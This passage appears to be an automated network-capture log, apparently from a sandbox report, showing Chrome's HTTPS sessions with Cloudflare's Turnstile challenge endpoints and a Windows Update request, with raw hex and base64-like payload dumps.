                                                          2024-08-27 22:10:41 UTC1369INData Raw: 61 6e 71 42 77 69 47 5a 39 67 71 75 71 6d 57 53 4c 67 47 74 37 62 49 36 30 74 33 53 45 74 70 6d 71 65 37 61 65 6d 4c 71 79 66 34 36 59 6f 49 61 46 6e 36 71 6c 76 73 6d 4a 76 73 61 63 79 71 61 38 6f 61 75 67 6b 38 33 52 6d 64 58 5a 76 4d 62 4e 6e 4d 6d 73 72 36 48 50 77 72 57 38 32 61 62 5a 33 36 57 75 35 38 2f 64 75 73 44 4a 38 75 7a 75 37 4b 76 45 36 50 6e 30 73 4f 37 35 75 63 48 76 2b 51 4f 34 39 41 44 52 31 67 59 4b 34 74 34 4d 35 51 45 51 38 51 6e 78 45 64 45 4a 34 64 41 4f 32 73 2f 35 43 68 50 58 39 66 6f 57 42 68 54 67 2f 4f 4c 6f 34 77 37 73 47 66 34 4c 2f 42 34 49 39 41 62 32 41 77 72 78 4c 6a 55 4c 48 42 59 63 2f 41 30 68 2b 78 6f 6a 46 42 4d 63 42 43 70 42 51 53 56 45 52 77 34 70 53 43 56 4e 4e 30 6b 70 4e 30 4e 50 55 7a 73 78 46 6b 42 64 4f 56
                                                          Data Ascii: anqBwiGZ9gquqmWSLgGt7bI60t3SEtpmqe7aemLqyf46YoIaFn6qlvsmJvsacyqa8oaugk83RmdXZvMbNnMmsr6HPwrW82abZ36Wu58/dusDJ8uzu7KvE6Pn0sO75ucHv+QO49ADR1gYK4t4M5QEQ8QnxEdEJ4dAO2s/5ChPX9foWBhTg/OLo4w7sGf4L/B4I9Ab2AwrxLjULHBYc/A0h+xojFBMcBCpBQSVERw4pSCVNN0kpN0NPUzsxFkBdOV
                                                          2024-08-27 22:10:41 UTC1369INData Raw: 64 47 4b 49 6d 35 36 46 62 61 47 6c 69 49 2b 53 62 6f 71 6d 6c 62 6d 6c 6d 72 75 76 69 5a 36 67 6a 35 74 39 66 34 44 49 70 71 6a 48 6b 36 47 39 75 5a 32 4a 72 73 65 50 68 71 37 49 6b 37 65 35 6b 63 76 46 7a 4e 36 32 6c 37 76 64 6e 62 32 65 30 39 44 49 32 4e 32 2f 36 39 36 32 36 65 48 6b 72 63 65 77 73 4f 44 70 32 4f 6a 45 7a 72 72 58 30 37 58 62 75 62 6a 73 35 50 54 35 32 77 6a 36 30 67 59 43 34 77 66 33 45 63 6e 2b 34 75 58 6a 35 75 38 4a 32 4e 45 4e 43 74 54 65 39 74 6e 61 38 67 55 41 2b 51 63 6d 2b 77 55 73 36 43 6b 71 4c 68 6a 70 4c 42 38 44 42 67 51 48 45 43 6e 31 38 53 30 71 39 50 33 31 2b 66 6f 54 4a 53 41 61 4a 30 59 63 49 77 4d 32 47 42 5a 48 44 78 70 53 53 78 49 66 54 46 4a 41 44 79 68 48 4b 7a 42 53 4b 7a 74 4a 53 31 67 31 4f 30 56 62 4d 6c 63
                                                          Data Ascii: dGKIm56FbaGliI+SboqmlbmlmruviZ6gj5t9f4DIpqjHk6G9uZ2JrsePhq7Ik7e5kcvFzN62l7vdnb2e09DI2N2/69626eHkrcewsODp2OjEzrrX07Xbubjs5PT52wj60gYC4wf3Ecn+4uXj5u8J2NENCtTe9tna8gUA+Qcm+wUs6CkqLhjpLB8DBgQHECn18S0q9P31+foTJSAaJ0YcIwM2GBZHDxpSSxIfTFJADyhHKzBSKztJS1g1O0VbMlc
                                                          2024-08-27 22:10:41 UTC1369INData Raw: 49 53 45 67 72 43 55 68 59 57 58 6a 4b 71 62 65 34 39 32 77 4c 65 54 6b 72 36 42 76 59 4e 2b 6f 5a 4f 43 6c 62 79 75 77 4d 65 75 6d 34 36 30 76 72 2b 33 73 49 71 6e 6c 4a 53 6f 73 63 2f 41 74 4d 71 39 6f 4c 37 41 6e 37 7a 56 77 71 58 6e 71 4f 6e 70 78 73 53 73 79 4d 2f 31 37 38 6a 72 72 37 44 75 75 2f 4c 70 74 50 58 4f 2b 2f 76 75 38 75 48 69 2f 74 33 43 39 50 62 31 7a 64 33 38 41 2f 7a 45 45 75 33 77 45 67 44 34 47 68 72 71 48 65 72 5a 48 66 54 76 34 65 33 73 38 76 45 6f 42 52 33 6e 43 52 73 46 4c 51 49 78 38 51 38 78 46 75 30 69 44 78 67 7a 4e 2f 4c 32 2f 43 34 53 4d 54 72 38 44 45 41 59 4f 45 49 79 4e 44 6c 48 53 43 30 72 51 53 6f 7a 52 30 68 41 53 79 6c 4f 52 54 41 31 54 6b 67 7a 54 31 70 4f 4e 69 31 65 55 6a 6c 67 51 46 31 57 62 44 68 42 61 44 35 74
                                                          Data Ascii: ISEgrCUhYWXjKqbe492wLeTkr6BvYN+oZOClbyuwMeum460vr+3sIqnlJSosc/AtMq9oL7An7zVwqXnqOnpxsSsyM/178jrr7Duu/LptPXO+/vu8uHi/t3C9Pb1zd38A/zEEu3wEgD4GhrqHerZHfTv4e3s8vEoBR3nCRsFLQIx8Q8xFu0iDxgzN/L2/C4SMTr8DEAYOEIyNDlHSC0rQSozR0hASylORTA1TkgzT1pONi1eUjlgQF1WbDhBaD5t
                                                          2024-08-27 22:10:41 UTC1369INData Raw: 4f 31 63 6f 61 6e 73 62 56 2b 71 33 71 4a 6d 35 75 58 6b 72 71 43 6d 4a 4b 41 76 63 71 48 74 6f 61 35 6a 37 7a 55 78 36 44 4d 7a 4d 4c 58 6d 61 6a 54 33 4d 72 54 34 4c 6a 50 74 4e 58 4f 78 37 36 6b 75 4e 4b 6e 71 72 6a 6c 34 4c 33 43 7a 39 48 46 30 4e 48 6e 36 39 4c 57 37 62 54 61 31 76 72 72 73 2b 43 35 35 4c 66 64 30 66 6f 41 33 4f 59 4c 79 38 33 70 43 77 2f 6d 42 4e 50 55 31 66 49 54 45 2b 38 4d 44 78 33 77 39 2f 73 65 39 42 54 62 35 50 72 64 42 51 51 57 47 41 59 72 37 51 45 4d 37 67 30 77 38 69 6f 31 49 66 45 79 4e 2f 6f 6c 2b 54 66 31 43 54 4d 64 41 52 34 50 48 7a 38 70 49 44 59 43 44 53 52 4c 51 7a 39 41 4a 55 77 6a 4c 6b 30 35 52 42 6c 4e 56 45 73 56 56 46 68 4c 4e 52 6c 61 50 46 6f 6d 51 46 74 48 4f 31 74 42 52 43 78 4a 50 55 77 2b 54 56 46 41 56
                                                          Data Ascii: O1coansbV+q3qJm5uXkrqCmJKAvcqHtoa5j7zUx6DMzMLXmajT3MrT4LjPtNXOx76kuNKnqrjl4L3Cz9HF0NHn69LW7bTa1vrrs+C55Lfd0foA3OYLy83pCw/mBNPU1fITE+8MDx3w9/se9BTb5PrdBQQWGAYr7QEM7g0w8io1IfEyN/ol+Tf1CTMdAR4PHz8pIDYCDSRLQz9AJUwjLk05RBlNVEsVVFhLNRlaPFomQFtHO1tBRCxJPUw+TVFAV
                                                          2024-08-27 22:10:41 UTC1369INData Raw: 59 72 4a 33 43 6b 37 36 41 70 72 57 44 6b 34 61 33 70 61 69 4b 6a 4d 65 50 6a 63 36 66 79 4d 75 65 6f 39 43 69 7a 71 72 50 31 64 4b 2f 31 62 65 30 77 72 58 5a 6f 4e 2f 43 79 65 50 71 35 73 44 71 34 2b 4c 67 34 4b 76 41 30 66 4c 49 79 4c 58 5a 37 39 6e 6e 33 72 66 68 36 66 50 54 7a 75 48 4f 39 76 33 6b 30 75 66 6e 37 51 50 67 43 65 72 79 43 4d 2f 65 34 51 33 77 44 2b 2f 6e 7a 68 76 32 47 77 33 64 37 68 6b 57 47 52 49 55 36 4e 2f 63 38 77 41 6e 2b 7a 44 6d 49 69 63 73 45 43 59 47 4e 44 41 78 4f 68 41 65 47 68 45 52 46 78 34 36 49 76 34 35 4b 43 45 31 4a 30 49 70 50 30 4e 45 49 6b 42 49 4f 79 51 6b 49 43 4a 51 4a 68 45 56 57 31 34 38 56 52 68 51 56 56 5a 4d 54 6a 45 6c 51 56 4e 57 59 43 6b 2b 4b 6d 38 69 57 31 70 6a 62 44 42 70 51 6b 42 4d 4d 6b 74 45 63 7a
                                                          Data Ascii: YrJ3Ck76AprWDk4a3paiKjMePjc6fyMueo9CizqrP1dK/1be0wrXZoN/CyePq5sDq4+Lg4KvA0fLIyLXZ79nn3rfh6fPTzuHO9v3k0ufn7QPgCeryCM/e4Q3wD+/nzhv2Gw3d7hkWGRIU6N/c8wAn+zDmIicsECYGNDAxOhAeGhERFx46Iv45KCE1J0IpP0NEIkBIOyQkICJQJhEVW148VRhQVVZMTjElQVNWYCk+Km8iW1pjbDBpQkBMMktEcz
                                                          2024-08-27 22:10:41 UTC1369INData Raw: 76 62 79 43 6c 37 32 6b 6f 33 36 34 76 36 4b 34 6a 34 69 4d 6f 61 32 66 6c 71 61 6b 6c 70 50 55 6a 38 62 58 7a 39 32 35 73 71 7a 57 78 74 2f 4a 75 71 72 4b 77 4f 43 6f 34 73 37 41 35 73 44 79 38 63 66 53 38 73 50 4a 7a 39 62 74 30 4e 7a 49 41 64 72 32 30 66 54 58 2f 64 66 53 32 41 4c 35 36 65 50 58 77 73 2f 4f 37 50 48 6d 46 51 4c 73 42 66 66 6d 39 50 63 62 43 39 34 56 33 50 6e 37 42 4e 38 57 4b 43 51 65 41 75 63 50 35 65 48 6f 2f 65 6f 46 4a 52 34 70 46 67 59 32 2b 42 7a 36 4b 7a 59 7a 47 79 49 32 4c 78 55 6a 42 7a 31 4b 4a 51 74 4d 47 30 42 51 4b 43 31 4c 52 7a 39 54 54 43 64 51 54 6a 41 54 52 6c 34 35 47 31 70 58 54 46 6b 7a 50 56 59 5a 53 54 34 7a 52 6c 68 5a 50 55 45 73 4c 45 64 52 50 55 70 6b 56 31 67 33 57 6b 78 49 57 33 4e 77 58 7a 35 33 67 46 4e
                                                          Data Ascii: vbyCl72ko364v6K4j4iMoa2flqaklpPUj8bXz925sqzWxt/JuqrKwOCo4s7A5sDy8cfS8sPJz9bt0NzIAdr20fTX/dfS2AL56ePXws/O7PHmFQLsBffm9PcbC94V3Pn7BN8WKCQeAucP5eHo/eoFJR4pFgY2+Bz6KzYzGyI2LxUjBz1KJQtMG0BQKC1LRz9TTCdQTjATRl45G1pXTFkzPVYZST4zRlhZPUEsLEdRPUpkV1g3WkxIW3NwXz53gFN
                                                          2024-08-27 22:10:41 UTC1369INData Raw: 37 71 67 7a 71 65 4d 30 6f 7a 49 30 63 76 48 72 4d 61 30 75 4a 65 59 6c 73 61 30 79 5a 65 76 30 38 44 42 73 75 65 33 71 62 69 30 76 2b 33 62 72 63 72 70 78 75 7a 4e 72 2b 2f 43 78 39 6a 37 78 76 58 55 39 64 48 50 75 4d 72 44 38 64 73 43 41 51 6e 65 41 77 33 39 35 50 37 65 35 73 2f 49 41 2f 7a 55 43 67 6b 44 47 73 7a 6d 39 4e 55 4c 45 2b 67 55 38 78 59 68 33 51 59 43 48 50 6e 67 41 78 6f 59 4b 42 38 63 41 43 54 75 37 43 77 68 42 76 41 77 4a 42 77 4f 2f 54 77 4c 46 78 45 34 4f 69 59 77 42 53 52 47 4b 68 37 39 50 55 38 37 55 51 30 77 4a 79 74 57 43 46 46 56 4d 6b 5a 45 46 6c 51 31 4d 43 70 41 4e 44 63 62 52 56 39 53 57 46 4a 6d 4e 54 78 43 4b 45 30 69 54 46 74 30 50 55 68 55 4c 55 51 7a 63 32 64 45 50 55 34 2b 67 58 77 30 64 6e 31 50 5a 47 4a 54 65 48 31 68
                                                          Data Ascii: 7qgzqeM0ozI0cvHrMa0uJeYlsa0yZev08DBsue3qbi0v+3brcrpxuzNr+/Cx9j7xvXU9dHPuMrD8dsCAQneAw395P7e5s/IA/zUCgkDGszm9NULE+gU8xYh3QYCHPngAxoYKB8cACTu7CwhBvAwJBwO/TwLFxE4OiYwBSRGKh79PU87UQ0wJytWCFFVMkZEFlQ1MCpANDcbRV9SWFJmNTxCKE0iTFt0PUhULUQzc2dEPU4+gXw0dn1PZGJTeH1h


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.449770104.18.94.414431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:10:43 UTC814OUTGET /cdn-cgi/challenge-platform/h/b/pat/8b9f6497ee820fa4/1724796641793/1d41b0915d96664d4c421588daa101f93a8179105dc076a56dbf01d319f547c8/wIkiMbIg4-l0Z4N HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          Cache-Control: max-age=0
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/idxkc/0x4AAAAAAAhuDbq9Zssi-YOu/auto/fbE/normal/auto/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:10:43 UTC143INHTTP/1.1 401 Unauthorized
                                                          Date: Tue, 27 Aug 2024 22:10:43 GMT
                                                          Content-Type: text/plain; charset=UTF-8
                                                          Content-Length: 1
                                                          Connection: close
                                                          2024-08-27 22:10:43 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 48 55 47 77 6b 56 32 57 5a 6b 31 4d 51 68 57 49 32 71 45 42 2d 54 71 42 65 52 42 64 77 48 61 6c 62 62 38 42 30 78 6e 31 52 38 67 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                          Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gHUGwkV2WZk1MQhWI2qEB-TqBeRBdwHalbb8B0xn1R8gAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                          2024-08-27 22:10:43 UTC1INData Raw: 4a
                                                          Data Ascii: J


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.44976752.165.165.26443
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:10:44 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=oOFFLGOpXKGaktU&MD=FTxB8uzd HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                          Host: slscr.update.microsoft.com
                                                          2024-08-27 22:10:44 UTC560INHTTP/1.1 200 OK
                                                          Cache-Control: no-cache
                                                          Pragma: no-cache
                                                          Content-Type: application/octet-stream
                                                          Expires: -1
                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                          ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                          MS-CorrelationId: a3ec8a75-a45a-4a52-b358-6f82cc5c6479
                                                          MS-RequestId: 68f8f754-c5ae-4f2c-be13-da062db2e479
                                                          MS-CV: 8GLVLDbdIEq775+B.0
                                                          X-Microsoft-SLSClientCache: 2880
                                                          Content-Disposition: attachment; filename=environment.cab
                                                          X-Content-Type-Options: nosniff
                                                          Date: Tue, 27 Aug 2024 22:10:43 GMT
                                                          Connection: close
                                                          Content-Length: 24490
                                                          2024-08-27 22:10:44 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                          Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                          2024-08-27 22:10:44 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                          Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.449775104.18.94.414431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:10:45 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/i/8b9f6497ee820fa4/1724796641795/JJoPtCsZIVs8EyO HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/idxkc/0x4AAAAAAAhuDbq9Zssi-YOu/auto/fbE/normal/auto/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:10:45 UTC200INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:10:45 GMT
                                                          Content-Type: image/png
                                                          Content-Length: 61
                                                          Connection: close
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f64b7ee9343af-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-08-27 22:10:45 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 56 00 00 00 49 08 02 00 00 00 28 b4 46 ee 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                          Data Ascii: PNGIHDRVI(FIDAT$IENDB`


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.449776104.18.94.414431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:10:45 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1155709742:1724793999:jZYsAJ5BQ_g2p6ZQyC6e2YcpgeQ98hmygX8r-9lG55k/8b9f6497ee820fa4/ec492f91dc9d6a6 HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:10:45 UTC379INHTTP/1.1 404 Not Found
                                                          Date: Tue, 27 Aug 2024 22:10:45 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 7
                                                          Connection: close
                                                          cf-chl-out: jaKlFK3BepuLI+voImRbyOVd/bNVJiaaIpI=$QGcQQo53PKtghY9q
                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f64b7f8c7333c-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-08-27 22:10:45 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                          Data Ascii: invalid


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.449781104.18.94.414431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:10:48 UTC927OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1155709742:1724793999:jZYsAJ5BQ_g2p6ZQyC6e2YcpgeQ98hmygX8r-9lG55k/8b9f6497ee820fa4/ec492f91dc9d6a6 HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          Content-Length: 32156
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          Content-type: application/x-www-form-urlencoded
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          CF-Challenge: ec492f91dc9d6a6
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Origin: https://challenges.cloudflare.com
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/idxkc/0x4AAAAAAAhuDbq9Zssi-YOu/auto/fbE/normal/auto/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:10:48 UTC16384OUTData Raw: 76 5f 38 62 39 66 36 34 39 37 65 65 38 32 30 66 61 34 3d 6e 64 76 4d 74 35 67 4c 7a 6d 79 68 64 75 36 38 53 38 53 68 76 5a 34 67 49 38 50 4d 63 4f 35 4c 67 37 6f 6f 38 70 30 47 36 67 4e 6f 38 35 30 35 44 67 70 38 49 2d 38 67 7a 4f 38 48 38 5a 30 38 36 67 6e 38 63 54 7a 38 31 4d 70 62 38 54 34 6c 2d 74 56 50 38 77 6a 5a 76 76 41 4f 5a 55 38 4d 73 72 37 4a 67 38 50 57 6c 4c 38 68 4d 47 58 38 36 4d 5a 58 68 38 5a 72 4d 47 4f 50 38 67 39 44 77 41 41 35 38 38 62 36 38 6e 7a 4d 58 79 4b 48 67 58 32 6e 4a 46 39 39 61 72 67 38 74 46 31 63 63 73 79 37 63 38 63 56 4a 46 62 4a 37 58 6c 73 76 38 2d 4d 4f 38 78 58 73 76 5a 32 76 38 5a 4d 35 47 62 47 76 6d 38 6f 76 64 6d 67 77 72 4e 37 2d 50 34 52 31 44 2d 49 45 72 66 6e 49 4b 78 37 31 50 79 59 4e 70 74 51 25 32 62 6b
                                                          Data Ascii: v_8b9f6497ee820fa4=ndvMt5gLzmyhdu68S8ShvZ4gI8PMcO5Lg7oo8p0G6gNo8505Dgp8I-8gzO8H8Z086gn8cTz81Mpb8T4l-tVP8wjZvvAOZU8Msr7Jg8PWlL8hMGX86MZXh8ZrMGOP8g9DwAA588b68nzMXyKHgX2nJF99arg8tF1ccsy7c8cVJFbJ7Xlsv8-MO8xXsvZ2v8ZM5GbGvm8ovdmgwrN7-P4R1D-IErfnIKx71PyYNptQ%2bk
                                                          2024-08-27 22:10:48 UTC15772OUTData Raw: 4f 41 4c 6f 35 38 38 35 6b 4e 36 43 58 76 30 38 53 39 34 67 4f 38 31 38 37 36 67 4d 67 6d 4d 46 76 35 44 74 71 76 79 4d 47 66 64 52 6b 45 7a 70 38 35 30 38 72 38 68 4d 5a 7a 38 42 64 43 30 67 4c 4d 70 6a 38 58 67 64 38 63 4d 38 58 5a 6f 38 69 38 47 2d 38 50 63 52 38 63 76 35 72 38 34 72 68 4f 73 46 38 72 4d 6d 4d 67 39 38 56 4d 6e 7a 35 53 38 37 4d 47 79 35 49 38 6a 64 75 79 35 6d 38 54 4d 68 64 38 4d 38 64 4d 70 76 38 4f 67 69 66 32 38 75 76 38 69 38 51 34 4a 76 67 37 4f 6d 64 67 4b 64 65 38 68 4b 4d 63 6c 69 42 6e 55 38 5a 4f 51 7a 6e 4d 70 68 38 78 38 51 4d 47 46 38 35 4d 35 76 75 63 67 49 4d 63 7a 67 4d 38 47 79 76 76 38 7a 38 65 38 37 79 5a 49 38 50 38 52 79 67 6d 38 4a 4d 6d 4d 5a 45 64 52 6c 47 68 38 50 4d 24 4d 67 38 38 4f 67 71 58 35 30 47 30 67
                                                          Data Ascii: OALo5885kN6CXv08S94gO81876gMgmMFv5DtqvyMGfdRkEzp8508r8hMZz8BdC0gLMpj8Xgd8cM8XZo8i8G-8PcR8cv5r84rhOsF8rMmMg98VMnz5S87MGy5I8jduy5m8TMhd8M8dMpv8Ogif28uv8i8Q4Jvg7OmdgKde8hKMcliBnU8ZOQznMph8x8QMGF85M5vucgIMczgM8Gyvv8z8e87yZI8P8Rygm8JMmMZEdRlGh8PM$Mg88OgqX50G0g
                                                          2024-08-27 22:10:49 UTC330INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:10:49 GMT
                                                          Content-Type: text/plain; charset=UTF-8
                                                          Content-Length: 26332
                                                          Connection: close
                                                          cf-chl-gen: RUikX/+tmJGXja8pjr1VSnJNEeflzgNtsPWgorCakg3KFyL97WKCZb5vCjK5pkf2t7XlzDd1ieBtVSBG$8ok1duCKFSWuajjS
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f64d058d34368-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-08-27 22:10:49 UTC1039INData Raw: 78 70 33 46 69 4b 69 6f 79 4d 36 6c 6d 34 33 55 71 6f 32 52 31 61 6e 53 72 4a 57 54 6e 61 69 5a 6c 36 43 67 74 64 2b 6b 30 39 75 6a 34 37 32 38 32 65 44 4c 32 4d 62 69 38 4b 76 49 76 2b 48 66 78 38 4f 33 32 75 6a 79 76 72 33 6f 34 63 2b 2f 38 74 50 2b 32 51 62 70 78 74 66 65 31 77 33 4e 34 39 6e 38 44 4d 6f 49 30 2b 4d 42 2b 66 4d 57 43 66 45 65 47 41 37 67 33 66 44 68 46 50 72 7a 38 41 41 6d 43 75 6b 6b 2b 51 62 69 43 69 30 56 2f 6a 49 74 4b 77 6b 54 4c 53 6b 48 46 6a 67 34 4c 79 7a 39 45 42 59 4f 4f 52 34 48 50 41 6c 45 4f 77 30 4b 47 79 41 62 45 6a 77 69 51 6a 4d 6c 54 46 45 35 46 46 41 78 59 46 59 7a 4c 46 6f 74 50 55 64 48 56 45 59 31 51 30 5a 73 57 6b 5a 63 4b 69 51 2b 59 79 39 76 59 47 41 79 5a 43 30 31 4d 30 6c 39 51 46 5a 69 64 54 61 45 63 33 4a
